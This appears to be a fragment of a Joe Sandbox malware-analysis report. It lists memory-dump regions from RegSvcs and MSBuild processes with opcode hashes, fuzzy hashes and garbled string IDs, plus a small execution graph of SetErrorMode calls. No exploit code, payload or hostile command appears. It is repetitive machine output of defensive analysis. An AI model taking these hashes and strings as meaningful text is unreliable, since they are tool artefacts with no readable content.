                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                            • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                            • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                            • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                            • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                            • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                            • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                            • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                            • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                            • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5137d3fdc4c6504c788b9908cadf660bb4c28327a3f84c76be7bd7d2d6b9c6f3
                                                                                                                            • Instruction ID: 372a6e0777eb4dbdab8f8c8dc1a263cf76434c939d5a947049ae4cfbc93d204b
                                                                                                                            • Opcode Fuzzy Hash: 5137d3fdc4c6504c788b9908cadf660bb4c28327a3f84c76be7bd7d2d6b9c6f3
                                                                                                                            • Instruction Fuzzy Hash: D4B09234E48148CFEB088B90D8488EDFB33FB48200F008100D8127221087342C05CEB0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ac70dcbb9f328026e4111eac1e9604b0ad317bc4d8d5e96e174eb8692f43524e
                                                                                                                            • Instruction ID: 20d836f90758710628ce5453382e5919c3cc1dd4d2be8b2d34f54ba4d9a120be
                                                                                                                            • Opcode Fuzzy Hash: ac70dcbb9f328026e4111eac1e9604b0ad317bc4d8d5e96e174eb8692f43524e
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: TJbq$TJbq$Te]q$xb`q
                                                                                                                            • API String ID: 0-3018173371
                                                                                                                            • Opcode ID: ac0d5bf77268875b43c13c0c9a35c2c1daad972a0ec0acff12a55760418ed72a
                                                                                                                            • Instruction ID: 0332a339ea5ea0e7f3be0f0e5fb026f1e39e29490a235227769be6885ef39062
                                                                                                                            • Opcode Fuzzy Hash: ac0d5bf77268875b43c13c0c9a35c2c1daad972a0ec0acff12a55760418ed72a
                                                                                                                            • Instruction Fuzzy Hash: F3C14671B006199FDB18DF69C994BA9BBF2BF88304F14C1A8E449EB361DA30ED45CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-3219822496
                                                                                                                            • Opcode ID: cade9cf6bcfd2eafc6d2fc453673426261b13a4670c29460a5002ec9d142af15
                                                                                                                            • Instruction ID: 1f4c17a04af7187d3223f9d482a5a2e55d4f087f3cf1d5bdd4a64c61b1069c05
                                                                                                                            • Opcode Fuzzy Hash: cade9cf6bcfd2eafc6d2fc453673426261b13a4670c29460a5002ec9d142af15
                                                                                                                            • Instruction Fuzzy Hash: 0BC15D34E04318CFEBA8CF64C955BADB7B2FB84301F5486A5E449AB295C7349E81CF91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-3219822496
                                                                                                                            • Opcode ID: 06bdb06885d1dc715c221c8855d4ff0e7a7d768a3cf1e80c3c1666cef8f0c993
                                                                                                                            • Instruction ID: fc157e8a998d5395197e84c840a5ba73cc1017a8150282d191a5aed76af82b15
                                                                                                                            • Opcode Fuzzy Hash: 06bdb06885d1dc715c221c8855d4ff0e7a7d768a3cf1e80c3c1666cef8f0c993
                                                                                                                            • Instruction Fuzzy Hash: DCB13E34E04318CFEBA8CF68C955BBDB7B2BB84301F508696E409AB291D7349E81CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: TXr$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-4271915648
                                                                                                                            • Opcode ID: e5d0c485b3f0a4303f04e773b2826f525404d2851db853e040dac721d2a1f1c2
                                                                                                                            • Instruction ID: 6b261d7593b0630fdad56820ac5f92476c72f8a5508417db78de6d67e3033032
                                                                                                                            • Opcode Fuzzy Hash: e5d0c485b3f0a4303f04e773b2826f525404d2851db853e040dac721d2a1f1c2
                                                                                                                            • Instruction Fuzzy Hash: 21E14E70E40229CFDBA4DF68C945BAEB7B2FB84700F108599D51AAB784DB349D81CF91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-477462128
                                                                                                                            • Opcode ID: 0052b21a1fcd922778ec56567c7f666d1f1151410ab21d0e32789e1b029331e3
                                                                                                                            • Instruction ID: ab3d47325b530e4cd7485c724163bd0d3f7e3f2f33f6ead3f3220c0652cb7f92
                                                                                                                            • Opcode Fuzzy Hash: 0052b21a1fcd922778ec56567c7f666d1f1151410ab21d0e32789e1b029331e3
                                                                                                                            • Instruction Fuzzy Hash: 02B15C34E04318CFDBA8CF68D941BADB7B2FB85301F5486A5E449AB291D7349E81CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-477462128
                                                                                                                            • Opcode ID: 95d335a8672d4017248d52a825f87ebabc845b90f1b589295d535a3e2847a9c0
                                                                                                                            • Instruction ID: b709245eed639f125e85d652a6df45e783a1ee3c20a19696d516ebf028a64d01
                                                                                                                            • Opcode Fuzzy Hash: 95d335a8672d4017248d52a825f87ebabc845b90f1b589295d535a3e2847a9c0
                                                                                                                            • Instruction Fuzzy Hash: 2EA13C34E04318CFDBA8CF68C951BBDB7B2BB85301F5486A6E449AB291D7349E81CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-477462128
                                                                                                                            • Opcode ID: 5c00f4a17bdca4156133f43864715059d812450a272a821582ce6cd8190c9ccd
                                                                                                                            • Instruction ID: e1caa2a34fe25eab996983b4aafc024f04b52e98d7ab79ee349c7dee1700fa49
                                                                                                                            • Opcode Fuzzy Hash: 5c00f4a17bdca4156133f43864715059d812450a272a821582ce6cd8190c9ccd
                                                                                                                            • Instruction Fuzzy Hash: 08A14D34E04318CFDBA8CF68C951BBDB7B2BB85301F5486A6E449AB291C7349E81CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-477462128
                                                                                                                            • Opcode ID: a7d348d028b8dafd0155a73ecebdd7cc1468d2322c6896b967676220e4585bac
                                                                                                                            • Instruction ID: 1dceb524e9bcc4816accac61451801007d8d4e32ffebd3ab6da976a2baa71268
                                                                                                                            • Opcode Fuzzy Hash: a7d348d028b8dafd0155a73ecebdd7cc1468d2322c6896b967676220e4585bac
                                                                                                                            • Instruction Fuzzy Hash: 9AA14D34E04318CFDBA8CF68C951BBDB7B2BB85301F5486A6E449AB291D7349E81CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-477462128
                                                                                                                            • Opcode ID: c5737a329a631f89016feb1191f3b180ed4c6691b8576ce74aeda80636872dcf
                                                                                                                            • Instruction ID: 3216c5ccfe8706c42ee5adf05fe94deaf7f2f359a6e1708ee7fc2195e205a3a9
                                                                                                                            • Opcode Fuzzy Hash: c5737a329a631f89016feb1191f3b180ed4c6691b8576ce74aeda80636872dcf
                                                                                                                            • Instruction Fuzzy Hash: 7CA13A34E04318CFDBA8CF68C951BBDB7B2BB85301F5486A6E449AB291D7349E81CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-477462128
                                                                                                                            • Opcode ID: 05a83443b7f0bb339aa226e7f5c23a5a816720e6612f11133c07a691aab809d7
                                                                                                                            • Instruction ID: 9792f1794c460eda9ed88c4c4b8ce3922f8217de54b4459562c897fe991d271d
                                                                                                                            • Opcode Fuzzy Hash: 05a83443b7f0bb339aa226e7f5c23a5a816720e6612f11133c07a691aab809d7
                                                                                                                            • Instruction Fuzzy Hash: 01A13C34E04318CFEBA8CF68C945BADB7B2FB85301F5486A5E409AB291D7349E81CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: fbq$ fbq$ fbq$ fbq
                                                                                                                            • API String ID: 0-4288062871
                                                                                                                            • Opcode ID: fe18b08ae14de259a763c050407ad20cfceace07eb745b78fb36892891407030
                                                                                                                            • Instruction ID: d65c494de081eed1031ad7ee670bbc13d708c2ee67db7e5a47ca63eeed15f33c
                                                                                                                            • Opcode Fuzzy Hash: fe18b08ae14de259a763c050407ad20cfceace07eb745b78fb36892891407030
                                                                                                                            • Instruction Fuzzy Hash: C2716D70A40218DFFBA49F68C961BE976F2FB45710F1084A9D409AB3C5C7749E81CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-858218434
                                                                                                                            • Opcode ID: d429b67ba58c8b96c4debb8e58df4051b4c8821cc827acc7df299476107a549c
                                                                                                                            • Instruction ID: ff76a2f63ec2495dcffd1b1e0a9ef638eb9beb885011b0b55b01f8a79ddd3870
                                                                                                                            • Opcode Fuzzy Hash: d429b67ba58c8b96c4debb8e58df4051b4c8821cc827acc7df299476107a549c
                                                                                                                            • Instruction Fuzzy Hash: A3518330A24115EFEFA4EB68E554B7D77F2AF40300F308466D5269B697DB348A41CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: [r$tM)$$]q$$]q
                                                                                                                            • API String ID: 0-1355478060
                                                                                                                            • Opcode ID: 49fe1f1550874622abcffb00ab623b5224dcc0ba36c218b354e186ce69a69712
                                                                                                                            • Instruction ID: ccc6756bd5e58520297178318f8945bee0aa93a869373d00ac433f434d1241e9
                                                                                                                            • Opcode Fuzzy Hash: 49fe1f1550874622abcffb00ab623b5224dcc0ba36c218b354e186ce69a69712
                                                                                                                            • Instruction Fuzzy Hash: 90318030A043548FEB958B24C954BAE77B3EB84304F54C6A9E54EAB385C7759D81CF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: [Yr$[Yr$\Yr$_Yr
                                                                                                                            • API String ID: 0-1119274631
                                                                                                                            • Opcode ID: 6b1e3a8b3666619f263e687950699cd9ef98626144af23d5e2c08eef792675a5
                                                                                                                            • Instruction ID: cd4ca977c97c263ded89946aa00fae6537160bc1867d8f1c0dcc3a92dc037e7f
                                                                                                                            • Opcode Fuzzy Hash: 6b1e3a8b3666619f263e687950699cd9ef98626144af23d5e2c08eef792675a5
                                                                                                                            • Instruction Fuzzy Hash: 4A0184317405018BF75876799912B2E26D7DBC0710F14C539E21F8B2CACE6CA94297D2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2221891793.0000000001320000.00000040.00000020.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_1320000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3ac69a0e892d6459d86bbe3ffbff841e1c81a34a694d5b9311447221214b3dee
                                                                                                                            • Instruction ID: fc31864a3c6a11ad1fc6dfafa0b12cef96dfa3d49c18d1cf5862fc630920ab50
                                                                                                                            • Opcode Fuzzy Hash: 3ac69a0e892d6459d86bbe3ffbff841e1c81a34a694d5b9311447221214b3dee
                                                                                                                            • Instruction Fuzzy Hash: 7301A9B65097806FD711CF059C44862FFB8DF86520709C49FEC498B652D135A919CB72
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2221891793.0000000001320000.00000040.00000020.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_1320000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 572332478e7ea3583b4920d3923571896532490b431e7632f391b9cc0a6e01a1
                                                                                                                            • Instruction ID: b6884cae9cf1b5d66dfe3383912aab045f896bd29204657d936b47a2d0d73fe7
                                                                                                                            • Opcode Fuzzy Hash: 572332478e7ea3583b4920d3923571896532490b431e7632f391b9cc0a6e01a1
                                                                                                                            • Instruction Fuzzy Hash: 80E092B66006009B9750CF0AED45452F7D8EB84630708C47FDC0D8B701D235B518CAA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2214472037.0000000000FC2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC2000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_fc2000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 765874a40b336e5ca5cbb355bfb096c1978ad1be14fb23d06a2cecf140bd16fe
                                                                                                                            • Instruction ID: b215da9b6c7e339f7eaf91bec7ba84a0b11c003453da364ee261edd06608fb1f
                                                                                                                            • Opcode Fuzzy Hash: 765874a40b336e5ca5cbb355bfb096c1978ad1be14fb23d06a2cecf140bd16fe
                                                                                                                            • Instruction Fuzzy Hash: 32D05E7A6056C24FD31ADA1CC2A9F953BE4AB51724F4A44FDA8008B763C768E9C1E600
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2214472037.0000000000FC2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC2000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_fc2000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9e2215744fc9447589612ccf9c44969496d7af39e6751250d30660a1e4451909
                                                                                                                            • Instruction ID: c8cf98222203563b5556126d06a8467489e2dbb739b80e4782f07ff5d7f25435
                                                                                                                            • Opcode Fuzzy Hash: 9e2215744fc9447589612ccf9c44969496d7af39e6751250d30660a1e4451909
                                                                                                                            • Instruction Fuzzy Hash: 30D05E347002C24BCB19DA1CC3D9F5937D4AB40724F0644ECAC108B762C7A8E8C0DA00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:4.6%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:7
                                                                                                                            Total number of Limit Nodes:1
                                                                                                                            execution_graph 281 f0a230 284 f0a25e SetErrorMode 281->284 283 f0a29f 284->283 277 f0a25e 278 f0a2b3 277->278 279 f0a28a SetErrorMode 277->279 278->279 280 f0a29f 279->280

                                                                                                                            Callgraph

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 f0a230-f0a288 2 f0a2b3-f0a2b8 0->2 3 f0a28a-f0a29d SetErrorMode 0->3 2->3 4 f0a2ba-f0a2bf 3->4 5 f0a29f-f0a2b2 3->5 4->5
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 00F0A290
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.2396359939.0000000000F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0A000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_f0a000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 2b7dc0a406c21dd2b969b69e186a0c599d3ebd2e01c6da7e4bcf49ce658e591c
                                                                                                                            • Instruction ID: d46a0d5f97528e2734ffd53c44685fcc8c50235b10e9f7f2c69634aed07a9cdf
                                                                                                                            • Opcode Fuzzy Hash: 2b7dc0a406c21dd2b969b69e186a0c599d3ebd2e01c6da7e4bcf49ce658e591c
                                                                                                                            • Instruction Fuzzy Hash: B4114F714093C09FDB128B15DD54A62BFB4DF47624F0880DAED858F6A3D265A908DB72
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 8 f0a25e-f0a288 9 f0a2b3-f0a2b8 8->9 10 f0a28a-f0a29d SetErrorMode 8->10 9->10 11 f0a2ba-f0a2bf 10->11 12 f0a29f-f0a2b2 10->12 11->12
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 00F0A290
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.2396359939.0000000000F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0A000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_f0a000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 5f31e77afcb654f25a4eee5671b913360681004c8e15c2a98918323b1363d669
                                                                                                                            • Instruction ID: b136305a957eb60a9cad141e7607a96b95593bcc03982b2540c177dd72431beb
                                                                                                                            • Opcode Fuzzy Hash: 5f31e77afcb654f25a4eee5671b913360681004c8e15c2a98918323b1363d669
                                                                                                                            • Instruction Fuzzy Hash: 3BF0AF36904740CFEB10CF45D988761FBE4EF04720F08C0AADD094B796D2B6E808EEA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 15 11105e1-1110603 16 1110606-1110620 15->16 17 1110626-1110643 16->17
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.2396629570.0000000001110000.00000040.00000020.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_1110000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e9ede1214a6ab7a5d471f51061166b5de47bbfb94c6ea4abf85b9d759273faae
                                                                                                                            • Instruction ID: a9bb66b56f18856183a3c641c62e921ff7ce4fc49fdb47083cb8c074a3e857aa
                                                                                                                            • Opcode Fuzzy Hash: e9ede1214a6ab7a5d471f51061166b5de47bbfb94c6ea4abf85b9d759273faae
                                                                                                                            • Instruction Fuzzy Hash: 8B0186B65097806FD7118F05AC45862FFA8DB86530709C59FEC498B652D129A909CB72
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 18 1110606-1110620 19 1110626-1110643 18->19
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.2396629570.0000000001110000.00000040.00000020.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_1110000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e2e249631a7232eb1772a914c1fbada131bc24f5200105c3431ca0c4d81fa521
                                                                                                                            • Instruction ID: 852894aeee6b63f95b9cde83ce2a6bfc622e1285d8112bd149c268cbcfa5294b
                                                                                                                            • Opcode Fuzzy Hash: e2e249631a7232eb1772a914c1fbada131bc24f5200105c3431ca0c4d81fa521
                                                                                                                            • Instruction Fuzzy Hash: 65E092B66006004B9654CF0AFD85462F7D8EB84630708C47FDC0D8BB05D275B508CAA5
                                                                                                                            Uniqueness

